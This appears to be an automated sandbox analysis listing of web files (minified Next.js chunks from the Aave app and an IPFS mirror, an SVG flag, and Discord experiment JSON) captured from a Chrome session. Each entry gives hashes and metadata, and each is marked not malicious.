                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4562],{96471:function(e,r,t){"use strict";var n=t(64836);r.Z=void 0;var i=n(t(64938)),s=t(85893),a=(0,i.default)((0,s.jsx)("path",{d:"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"}),"ArrowBackOutlined");r.Z=a},21386:function(e,r,t){"use strict";var n=t(64836);r.Z=void 0;var i=n(t(64938)),s=t(85893),a=(0,i.default)((0,s.jsx)("path",{d:"M9 16.17 5.53 12.7a.9959.9959 0 0 0-1.41 0c-.39.39-.39 1.02 0 1.41l4.18 4.18c.39.39 1.02.39 1.41 0L20.29 7.71c.39-.39.39-1.02 0-1.41a.9959.9959 0 0 0-1.41 0L9 16.17z"}),"CheckRounded");r.Z=a},65445:function(e,r,t){"use strict";var n=t(54235),i=t(85893);r.Z=(0,n.Z)((0,i.jsx)("path",{d:"M7.41 8.59 12 13.17l4.59-4.58L18 10l-6 6-6-6 1.41-1.41z"}),"KeyboardArrowDown")},78678:function(e,r,t){"use strict";var n=t(54235),i=t(85893);r.Z=(0,n.Z)((0,i.jsx)("path",{d:"M7.41 15.41 12 10.83l4.59 4.58L18 14l-6-6-6 6z"}),"KeyboardArrowUp")},73881:function(e,r,t){"use strict";t.r(r),t.d(r,{default:fu
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (37318), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):37318
                                                                                                                                                                                                                                                  Entropy (8bit):5.458466014941654
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:RYG/7RNLxiC0j5WeOpHhqGTpHrcKl+OHA9gDr8M8R+yy9fd8x356:RXLxiC0j5cpHzTpHdDr8M8cyy9l8xY
                                                                                                                                                                                                                                                  MD5:67D71AA110F188D9107648C4A497B6AB
                                                                                                                                                                                                                                                  SHA1:88B8D6738CA51981D687F09C2ABD43DDF231D085
                                                                                                                                                                                                                                                  SHA-256:36887E8CF092BC56DE03645ABB67B610E0908F2A514F6CF90755D2D8ADE52CFF
                                                                                                                                                                                                                                                  SHA-512:595524C8B9D70C634F53692F077E41764E47E28630BA6BCFA9E98BC23863E4185ED44993F9F1C917CE73C0EDE1F93E51CCB925B5C5B29D3124F23C25D1D87CEA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/pages/staking-81c5f92db5f61cfe.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8879],{26814:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return ge}});var i=n(17674),r=n(49501),o=n(75331),s=n(56365),a=n(30120),l=n(29630),c=n(79072),d=n(9144),x=n(75084),u=n(81645),h=n(5151),m=n(56371),p=n(5152),j=n(67294),v=n(59499),f=n(4730),b=n(70918),g=n(90149),k=n(68682),y=n(41024),w=n(68861),Z=n(72667),C=n(58527),A=n(77912),S=n(78371),T=n(85893),P=function(e){var t,n,o,s,c,x,u,h,m,p=e.stakedToken,j=e.icon,v=(0,S.Y)((function(e){return e.currentMarketData})),f="",b=(0,A.I)(v).data;if(b&&Array.isArray(b)){var g=(0,i.Z)(b,4);x=g[0],u=g[1],h=g[2],m=g[3]}"AAVE"==p&&(f=(null===(t=x)||void 0===t?void 0:t.stakeApy)||"0"),"ABPT"==p&&(f=(null===(n=u)||void 0===n?void 0:n.stakeApy)||"0"),"GHO"==p&&(f=(null===(o=h)||void 0===o?void 0:o.stakeApy)||"0"),"ABPT V2"==p&&(f=(null===(s=m)||void 0===s?void 0:s.stakeApy)||"0");var P=Date.now()/1e3>Number(null===(c=h)||void 0===c?void 0:c.distributionEnd);return(0,T.jsxs)(a.Z
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12924), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):12924
                                                                                                                                                                                                                                                  Entropy (8bit):5.203577157748669
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:Nvh8g0JFC25gGTV6C3RN3sNzU8oVyF36QLm1Sx2pOsYZMso:NvqDC2l6QsN48oVPQ5gYseMX
                                                                                                                                                                                                                                                  MD5:D850E190CE84C391F351FC30DC658F59
                                                                                                                                                                                                                                                  SHA1:E2F2F4AC8A8ADC1BC844A049250DCFAE19CB0C10
                                                                                                                                                                                                                                                  SHA-256:50CA3CC41C9BED4B3940FBF57F56036633FD7DF46F8AC36212479F292038A0C5
                                                                                                                                                                                                                                                  SHA-512:72D85E220237D3BE7CCF1FF54731E4AA77A4F9FA2503BCDC8D95D1C773282FA8E8D512546A0B2758197C984283B8EF18F3282347FA150C1281B4A73812CE7FC7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/1315-7550bff8c0343bd6.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1315],{89722:function(e,t,r){"use strict";r.d(t,{Z:function(){return g}});var o=r(87462),n=r(63366),s=r(67294),i=r(86010),a=r(94780),l=r(81719),u=r(78884),c=r(36622),h=r(34867);function p(e){return(0,h.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var d=r(85893);const f=["baseClassName","className","color","component","fontSize"],v=(0,l.ZP)("span",{name:"MuiIcon",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:r}=e;return[t.root,"inherit"!==r.color&&t[`color${(0,c.Z)(r.color)}`],t[`fontSize${(0,c.Z)(r.fontSize)}`]]}})((({theme:e,ownerState:t})=>({userSelect:"none",width:"1em",height:"1em",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (14194), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):14194
                                                                                                                                                                                                                                                  Entropy (8bit):5.487452494532276
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:OxvgZ4Ybcnri8/C1W7WbafAj4/1LBzVIx:4g+YoOGCz0/9BzV+
                                                                                                                                                                                                                                                  MD5:8B5F3929CA7A9C359046FF238B613A52
                                                                                                                                                                                                                                                  SHA1:503B0F39A6F5AAC01B7A300A6F2F565A0CCB6C03
                                                                                                                                                                                                                                                  SHA-256:43045AEF9B1636CBBD46B6608AC72B9C2855922FCF4C6AFFA736F0CFE53486CE
                                                                                                                                                                                                                                                  SHA-512:7F73EE8570432417E6B9971A95C6816DD1D8FCA38F1952CFDC6B23D4901155A88D36B21EC5A9151144C155FC715578EFA4A04098D5840A16E72E7B6FDB77600D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1573],{57824:function(e,n,r){r.d(n,{m6:function(){return I},oD:function(){return D},XJ:function(){return C},Bx:function(){return T},JV:function(){return S},aE:function(){return w},jz:function(){return L},Pu:function(){return B}});var t=r(59499),i=r(4730),a=r(49501),o=r(80227),s=r(81645),c=r(30120),l=r(29630),d=r(91655),x=r(22841),u=r(54181),p=r(56371),j=(r(67294),r(44749)),h=r(92391),v=r(29946),f=r(96875),m=r(68682),b=r(41024),g=r(72667),y=r(35643),O=r(85893),A=["description","value","futureValue","numberPrefix","iconSymbol","loading"];function Z(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getOwnPropertySymbols(e);n&&(t=t.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),r.push.apply(r,t)}return r}function P(e){for(var n=1;n<arguments.length;n++){var r=null!=arguments[n]?arguments[n]:{};n%2?Z(Object(r),!0).forEach((function(n){(0,t.Z)(e,n,r[n])})):Object.getOwn
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9645), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):9645
                                                                                                                                                                                                                                                  Entropy (8bit):5.468661838687384
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:Hvk43sJ/0ove4Tvp3JRG8WZX/zg8Fr8qHPzn0zCjXNaLm1Sx2pOsYKZIo:HvB3sNpve4TvpK8Wl/zmc70W7Na5gYsj
                                                                                                                                                                                                                                                  MD5:00EE47482B87F6A12030E826DD8DFAC7
                                                                                                                                                                                                                                                  SHA1:FDD69DFEF21CF23F199EED2CF00AF3D419C06FE4
                                                                                                                                                                                                                                                  SHA-256:AC532CEB2C222BF4EF02F34FD300749F248C55240866312B04DDDD52F30C35A5
                                                                                                                                                                                                                                                  SHA-512:B32CA8A96E4DC80D32C68C86D489946F6257E0F6E41731564BDD314E60F497F8F874D9D575ABD0DBFE90B829E4470722002831215D3D49EFB1C7A39A0495EB24
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/1102-a299e0e4a621aea1.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1102],{96471:function(e,t,r){var o=r(64836);t.Z=void 0;var n=o(r(64938)),a=r(85893),i=(0,n.default)((0,a.jsx)("path",{d:"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"}),"ArrowBackOutlined");t.Z=i},21386:function(e,t,r){var o=r(64836);t.Z=void 0;var n=o(r(64938)),a=r(85893),i=(0,n.default)((0,a.jsx)("path",{d:"M9 16.17 5.53 12.7a.9959.9959 0 0 0-1.41 0c-.39.39-.39 1.02 0 1.41l4.18 4.18c.39.39 1.02.39 1.41 0L20.29 7.71c.39-.39.39-1.02 0-1.41a.9959.9959 0 0 0-1.41 0L9 16.17z"}),"CheckRounded");t.Z=i},81481:function(e,t,r){var o=r(54235),n=r(85893);t.Z=(0,o.Z)((0,n.jsx)("path",{d:"m20 12-1.41-1.41L13 16.17V4h-2v12.17l-5.58-5.59L4 12l8 8 8-8z"}),"ArrowDownward")},65445:function(e,t,r){var o=r(54235),n=r(85893);t.Z=(0,o.Z)((0,n.jsx)("path",{d:"M7.41 8.59 12 13.17l4.59-4.58L18 10l-6 6-6-6 1.41-1.41z"}),"KeyboardArrowDown")},78678:function(e,t,r){var o=r(54235),n=r(85893);t.Z=(0,o.Z)((0,n.jsx)("path",{d:"M7.4
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):70543
                                                                                                                                                                                                                                                  Entropy (8bit):5.443304347648602
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:Mk/KYVecVwNTv6EP8yiEVun51II7OzOAqpq3nmFpijktGnNgmELibDC4JbdEymsq:M0zejNTv6fTIIazpD3mF4jk0E+Ccm
                                                                                                                                                                                                                                                  MD5:5C6E1CB3531AE2B7393D1718BDAE95E5
                                                                                                                                                                                                                                                  SHA1:77478556A2513BFA79A1013A6144450084BFAE04
                                                                                                                                                                                                                                                  SHA-256:0FF0F10151A016F9A4503E21C8D1420FF1EA289967E9F90EE44087575003FEFE
                                                                                                                                                                                                                                                  SHA-512:8FF544E25C9B8D9E665E61A86E8781810D25DDDB9DAC6BC5CDEA6548D7817EEFAD84630F70BA978A26416231ABD8D4A5EFA795239B616E3E6A007D6BE9285738
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/3253.7a4e57b5a8b3929a.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3253],{96875:function(e,t,n){n.d(t,{o:function(){return b}});var r=n(59499),i=n(4730),a=n(49501),o=n(1279),s=n(62097),c=n(30120),u=n(29630),l=n(75084),d=n(70794),p=n(41024),m=n(85893),f=["value","onInfoClick"];function y(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function x(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?y(Object(n),!0).forEach((function(t){(0,r.Z)(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):y(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}var b=function(e){var t=e.value,n=e.onInfoClick,r=(0,i.Z)(e,f),y=(0,s.Z)().palette,b=Number((0,o.hE)(t).toFixed(2,d.Z.ROUND_DOWN)),h="";ret
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (16384), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                  Entropy (8bit):5.586883037796327
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:cyPm+dOyFQSzKCUaufok1bE1pCtoqPmEpmjVHubNjE2pElTkwX:cyP9dpFQYGoEWC5Bp0uhjE2Gl1X
                                                                                                                                                                                                                                                  MD5:5CAEA66A94ED3F92D45CC0E555CD6201
                                                                                                                                                                                                                                                  SHA1:7623E7E85F72A29370A8F046E3FF9982FCD95039
                                                                                                                                                                                                                                                  SHA-256:5C57947307554FAD2A1FA28A1291FFBF128471C99F38B02C343E2B103F7BD408
                                                                                                                                                                                                                                                  SHA-512:52427E81A89A20EEF3AB9FC8B03642D3B771B2DF4F0385CD644BAF4180F7D412FEBB5FAE1A9E55B7EA7B673CF9EDDCC91393880E6A8BFF68CED9D56118058310
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/9671.96a31e2ffa610a87.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9671],{62753:function(e,r,t){var n=t(64836);r.Z=void 0;var o=n(t(64938)),s=t(85893),a=(0,o.default)((0,s.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");r.Z=a},89722:function(e,r,t){t.d(r,{Z:function(){return A}});var n=t(87462),o=t(63366),s=t(67294),a=t(86010),i=t(94780),l=t(81719),c=t(78884),u=t(36622),d=t(34867);function v(e){return(0,d.Z)("MuiIcon",e)}(0,t(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var p=t(85893);const f=["baseClassName","classNa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1041
                                                                                                                                                                                                                                                  Entropy (8bit):4.791566518594403
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:tcGtupzDW+k7Oq5NSqTNhReWpRYfjBjkTkCPXUtkv:2GSG7OqPBaFp2ks
                                                                                                                                                                                                                                                  MD5:EAA405456DB4FB48D937AF1DB371B835
                                                                                                                                                                                                                                                  SHA1:D7F4DF1702BF830C60ABA056BDFE947D941D5430
                                                                                                                                                                                                                                                  SHA-256:6FA4DDBD9B1E81DAEF550A249A098431CAAE4CC5B9AAEAADAD86A547D32EEDB4
                                                                                                                                                                                                                                                  SHA-512:E5F590A73EE767AEB9EA03BD7120A84CFCE8563D41934761B6CE8C2DACC3D67B85C1443475F7F03AC616F17489AE6B8FE25D8A90C70BEC184B8583C2D6D56AE4
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg viewBox="0 0 20 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M-3.628-.076v14.154h26.96V-.076h-26.96Z" fill="#012169"/><path d="m-3.628-.076 26.96 14.154L-3.628-.076Zm26.96 0-26.96 14.153L23.332-.076Z" fill="#000"/><path d="M22.73 15.344 9.852 8.583l-12.878 6.761-1.205-2.534L6.837 7-4.23 1.19l1.205-2.534L9.852 5.417 22.73-1.344l1.205 2.534L12.867 7l11.068 5.81-1.205 2.534Z" fill="#fff"/><path d="m-3.628-.076 26.96 14.154L-3.628-.076Zm26.96 0-26.96 14.153L23.332-.076Z" fill="#000"/><path d="M22.93 14.921 9.852 8.054-3.226 14.92l-.805-1.689L7.843 7-4.03.767l.805-1.689L9.852 5.946 22.93-.922l.805 1.69L11.86 7l11.874 6.232-.805 1.69Z" fill="#C8102E"/><path d="M9.852-.076v14.154V-.076ZM-3.628 7h26.96-26.96Z" fill="#000"/><path d="M12.099 14.077H7.605V9.36H-3.628V4.64H7.605V-.076h4.494V4.64h11.233v4.72H12.1v4.717Z" fill="#fff"/><path d="M9.852-.076v14.154V-.076ZM-3.628 7h26.96-26.96Z" fill="#000"/><path d="M11.2 14.077H8.504V8.416H-3.628V5.585H8.504V-.076H11.2v5.66h12.132v
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (34044)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):34045
                                                                                                                                                                                                                                                  Entropy (8bit):4.447788419305482
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:yy7uis7SWT7xFb1CcPtMjBupLTBr3DozAbb2S+h3pjeuOzPRTfZoDpavLhuYpWP:y0uis7Rz3ku1BVbbqUNJgacn
                                                                                                                                                                                                                                                  MD5:C297E52043BD0E4C7C9DF1DD5D5672F5
                                                                                                                                                                                                                                                  SHA1:A65A92DD6E8CE988C0A39C14BF475BD3E519E809
                                                                                                                                                                                                                                                  SHA-256:04C226D4C879D32A8FE5CA7C6FFA3FC079F7FC9FA8E94F0C6551906C90B73094
                                                                                                                                                                                                                                                  SHA-512:B6244FFF4358ED45814C722B087D5AE80DFB1C9A0530F189A4D1F6B186AC7E057CD31C43E66E81B98223A1580F20AABF015EBDB7A313223BD5A0822DB0D0E617
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/api/v9/experiments?with_guild_experiments=true
                                                                                                                                                                                                                                                  Preview:{"fingerprint":"1289439632471363617.A-2PoLKzD9-wa7EEU6orKB9Ramc","assignments":[[2810205487,1,1,-1,3,5564,0,0],[2617218444,4,1,-1,2,3646,0,0],[3035674767,0,1,-1,0,963,0,0],[1609782151,0,1,-1,2,2250,0,0],[3643362751,0,1,-1,0,7863,0,0],[3753034466,1,2,-1,0,4525,0,0],[1913882179,0,1,-1,2,3503,0,0],[1567199723,0,1,-1,1,7338,0,0],[3091068323,0,2,-1,10,9510,0,0],[454783470,4,1,-1,0,3237,0,0],[3450899088,1,1,-1,0,1330,0,0],[3656796460,3,1,-1,3,3376,0,0],[2519288568,0,1,-1,4,6281,0,0],[1814483290,0,1,-1,0,9211,0,0],[4221006726,0,1,-1,0,4303,0,0],[1398673921,1,1,-1,0,4478,0,0],[2532700533,0,1,-1,0,4302,0,0],[3557480712,0,1,-1,0,547,0,0],[853403133,4,1,-1,0,5117,0,0],[2491005019,4,1,-1,0,1740,0,0],[3889077804,2,1,-1,0,1028,0,0],[4079214319,2,1,-1,0,8647,0,0],[1532280548,16,1,-1,5,8889,0,0],[1095779154,0,1,-1,4,7619,0,0],[1398007839,0,1,-1,2,2853,0,0],[1034661306,0,1,-1,0,5496,0,0],[1944696695,0,1,-1,0,170,0,0],[828251710,2,1,-1,1,2757,0,0],[3124003316,1,1,-1,0,3662,0,0],[2676348506,0,1,-1,0,7611
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):85086
                                                                                                                                                                                                                                                  Entropy (8bit):5.283227041512326
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:27psBNl+rm1CE7MWnzGVirQMq1rgq6LMEvA:lBT+rmJyeQMerZaA
                                                                                                                                                                                                                                                  MD5:87B532C88E0A0E2A394DA9D3BEAB5CE6
                                                                                                                                                                                                                                                  SHA1:4159C039BBF2D0659A39CD3DDAF7D6DC3F3981E7
                                                                                                                                                                                                                                                  SHA-256:00382EBCBCCEE5EDE71F8D6D644D26B47C76CEA454B329D523A61F70B95850C9
                                                                                                                                                                                                                                                  SHA-512:BAE77661FBDDC7B7579D950426AF5589374C3C201C20FB8EE381728B64B124EE66C7E0D6AC579AC81753502AB9040DDAD589D188B135CC82E68C5DD06C33B4D5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{63133:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(){var e=null;return{mountedInstances:new Set,updateHead:function(t){var r=e=Promise.resolve().then((function(){if(r===e){e=null;var a={};t.forEach((function(e){if("link"===e.type&&e.props["data-optimized-fonts"]){if(document.querySelector('style[data-href="'.concat(e.props["data-href"],'"]')))return;e.props.href=e.props["data-href"],e.props["data-href"]=void 0}var t=a[e.type]||[];t.push(e),a[e.type]=t}));var i=a.title?a.title[0]:null,u="";if(i){var c=i.props.children;u="string"===typeof c?c:Array.isArray(c)?c.join(""):""}u!==document.title&&(document.title=u),["meta","base","link","style","script"].forEach((function(e){!function(e,t){var r=document.getElementsByTagName("head")[0],a=r.querySelector("meta[name=next-head-count]");0;for(var i=Number(a.content),u=[],c=0,s=a.previousElementSibling;c<i;c++,s=(null===s||void 0===s?v
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):85086
                                                                                                                                                                                                                                                  Entropy (8bit):5.283227041512326
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:27psBNl+rm1CE7MWnzGVirQMq1rgq6LMEvA:lBT+rmJyeQMerZaA
                                                                                                                                                                                                                                                  MD5:87B532C88E0A0E2A394DA9D3BEAB5CE6
                                                                                                                                                                                                                                                  SHA1:4159C039BBF2D0659A39CD3DDAF7D6DC3F3981E7
                                                                                                                                                                                                                                                  SHA-256:00382EBCBCCEE5EDE71F8D6D644D26B47C76CEA454B329D523A61F70B95850C9
                                                                                                                                                                                                                                                  SHA-512:BAE77661FBDDC7B7579D950426AF5589374C3C201C20FB8EE381728B64B124EE66C7E0D6AC579AC81753502AB9040DDAD589D188B135CC82E68C5DD06C33B4D5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/main-37e08f82b0681cde.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{63133:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(){var e=null;return{mountedInstances:new Set,updateHead:function(t){var r=e=Promise.resolve().then((function(){if(r===e){e=null;var a={};t.forEach((function(e){if("link"===e.type&&e.props["data-optimized-fonts"]){if(document.querySelector('style[data-href="'.concat(e.props["data-href"],'"]')))return;e.props.href=e.props["data-href"],e.props["data-href"]=void 0}var t=a[e.type]||[];t.push(e),a[e.type]=t}));var i=a.title?a.title[0]:null,u="";if(i){var c=i.props.children;u="string"===typeof c?c:Array.isArray(c)?c.join(""):""}u!==document.title&&(document.title=u),["meta","base","link","style","script"].forEach((function(e){!function(e,t){var r=document.getElementsByTagName("head")[0],a=r.querySelector("meta[name=next-head-count]");0;for(var i=Number(a.content),u=[],c=0,s=a.previousElementSibling;c<i;c++,s=(null===s||void 0===s?v
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (23986), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):23986
                                                                                                                                                                                                                                                  Entropy (8bit):5.495770589824078
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:xyPmyJ2bTQVVeiHfeZVelMzjmATnhCsR5+iYPTpyEOVdp2N/zH:xyPwWVecfOVelMnmmnhCsii01Gp2VzH
                                                                                                                                                                                                                                                  MD5:6FDE7934F047CACADA9F17DB3FA0F110
                                                                                                                                                                                                                                                  SHA1:425BBE8E3E3B71E18781CD86267BED79E8D74C52
                                                                                                                                                                                                                                                  SHA-256:1A7AAFF94E3147A03B8109FFC467570D06556F9F8AE5F5D44CDAFAEE5CDB4FBD
                                                                                                                                                                                                                                                  SHA-512:50884D003DD70372CF60FEF9BEDFDE1DFDC5A425F0083D00E121D652240A055E938E87E7758231C1BD77A4F21CC7830EF28D3ADB4D8146488508DA2A6D3430F1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6790],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),i=r(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},96875:function(e,t,r){r.d(t,{o:function(){return j}});var n=r(59499),o=r(4730),i=r(49501),a=r(1279),s=r(62097),c=r(30120),l=r(29630),u=r(75084),d=r(70794),p=r(41024),x=r(85893),f=["value","onInfoClick"];function m(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):109609
                                                                                                                                                                                                                                                  Entropy (8bit):5.402692401363658
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:QCBKa1GvPzsGolumyOSsN5VYpLUBDL2QPidmHTRWipxpoAkF+d1j0o:1B9MT1a5YpL5kl9pxp0a1jb
                                                                                                                                                                                                                                                  MD5:651A7D831E29418FE8534CA30698909E
